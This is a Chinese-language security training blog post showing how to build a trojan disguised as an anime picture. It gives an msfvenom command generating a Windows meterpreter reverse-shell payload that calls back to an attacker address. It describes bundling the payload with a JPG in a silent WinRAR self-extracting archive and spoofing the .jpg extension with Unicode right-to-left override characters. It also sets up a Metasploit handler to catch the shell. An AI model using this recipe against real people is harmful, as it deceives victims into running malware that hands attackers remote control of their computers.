网络安全-解密WinRAR捆绑恶意程序并自动上线MSF的原理

Posted 2021-12-11 学神来啦

文章目录

• 生成伪装恶意程序的封面图标
• 捆绑恶意程序和图片并设置自动运行
• 使用Unicode字符修改文件名后缀
• 通过访问图片自动获取目标shell

---

生成伪装恶意程序的封面图标

需要安装rar压缩工具。
WinRAR官网：http://www.winrar.com.cn/
下载安装即可不需要特殊配置。

msfvenom生成exe

┌──(root💀xuegod53)-[~]
└─# msfvenom  -p windows/meterpreter/reverse_tcp  LHOST=192.168.1.53 LPORT=4444 -f exe -o /var/www/html/dongman.exe

准备一张图片

图片生成ico图标用于恶意程序的封面图标：http://www.ico51.cn/
注：图片尺寸选最大的，也可以找一下其它的ico图标生成网站。

转换后会自动下载

捆绑恶意程序和图片并设置自动运行

选中dongman.exe和dongman.jpg添加到压缩文件。

勾选：创建自解压格式压缩文件

设置自解压选项

解压路径：C:\\Windows\\Temp
注：dongman.exe和dongman.jpg会被解压到C:\\Windows\\Temp

解压后运行dongman.exe和dongman.jpg
C:\\Windows\\Temp\\dongman.jpg
C:\\Windows\\Temp\\dongman.exe

静默方式解压

更新方式
多次解压可能会出现文件已经存在的情况，如果文件存在会询问用户。
建议选择覆盖所有文件或跳过已存在的文件。
覆盖：缺点是如果exe程序已经运行那么覆盖会失败。
跳过：如果exe文件的参数有修改跳过后则运行的还是旧版本。
建议：每次制作不要用相同的名字。

添加刚才生成的ico图标。

生成后的自解压文件。

使用Unicode字符修改文件名后缀

重命名

选中文件名鼠标右键插入RLO
RLO从右到左
LRO从左到右

插入gpj，RLO是从右到左，所以最终gpj=jpg

此时文件名后缀为exe.jpg，那这样还不理想，文件名部分是exe还是没什么意义

添加文件名
重命名，在exe前面插入Unicode控制字符LRO

输入文件名：动漫gpj.exe‬‬‬‬‬‬

最终效果，文件有ico图标伪装图片的缩略图，文件名后缀.jpg来伪装文件类型。
注：exe.不可以去掉

通过访问图片自动获取目标shell

┌──(root💀xuegod53)-[~]
└─# msfdb run     
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.53
msf5 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run

打开动漫gpj.exe

图片文件自动打开

MSF成功上线

临时目录下文件也都存在。
C:\\Windows\\Temp

更多技术干货请关注公众号【学神来啦】！

想要获取视频教程的
请联系我们的小姐姐